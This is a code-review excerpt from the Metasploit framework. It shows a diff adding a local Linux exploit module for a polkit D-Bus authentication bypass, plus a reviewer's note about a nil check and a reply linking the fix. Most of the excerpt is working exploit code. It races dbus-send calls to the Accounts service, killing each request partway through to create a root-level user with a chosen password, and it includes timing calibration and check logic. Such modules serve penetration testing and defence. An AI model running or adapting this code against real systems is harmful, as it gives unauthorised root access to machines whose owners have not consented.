modules/exploits/linux/local/polkit_dbus_auth_bypass.rb

```diff
@@ -0,0 +1,384 @@
+    )
+    register_options([
+      OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
+      OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
+      OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15]),
+      OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  def get_loop_sequence
+    datastore['ITERATIONS'].times.map(&:to_s).join(' ')
+  end
+
+  def exploit_set_realname(new_realname)
+    loop_sequence = get_loop_sequence
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts/User0
+          org.freedesktop.Accounts.User.SetRealName
+          string:'#{new_realname}' &
+        sleep #{@cmd_delay};
+        kill $!;
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --print-reply
+          /org/freedesktop/Accounts/User0
+          org.freedesktop.DBus.Properties.Get
+          string:org.freedesktop.Accounts.User
+          string:RealName
+        | grep "string \\"#{new_realname}\\"";
+        if [ $? -eq 0 ]; then
+          echo success;
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def executable?(path)
+    cmd_exec("test -x '#{path}' && echo true").include? 'true'
+  end
+
+  def get_cmd_delay
+    user = rand_text_alphanumeric(8)
+    time_command = "bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\"#{user}\" int32:1'"
+    time = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\s+\d+m(\d+.\d+)s/)
+    unless time && time[1]
+      print_error("Unable to determine the time taken to run the dbus command. Without this information the exploit cannot continue. The command that failed was: #{time_command}")
+      return nil
+    end
+    time[1].to_f / 2
+  end
+
+  def check
+    unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
+      return CheckCode::Safe('The polkit framework is not installed.')
+    end
+
+    unless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/
+      return CheckCode::Safe('The dbus-send command is not accessible.')
+    end
+
+    # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit
+    @cmd_delay = get_cmd_delay
```

Comment:
Make sure this isn't `nil` before using it.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15368/commits/d4a6976bdebabaac020a60ec45af6d609b8111fd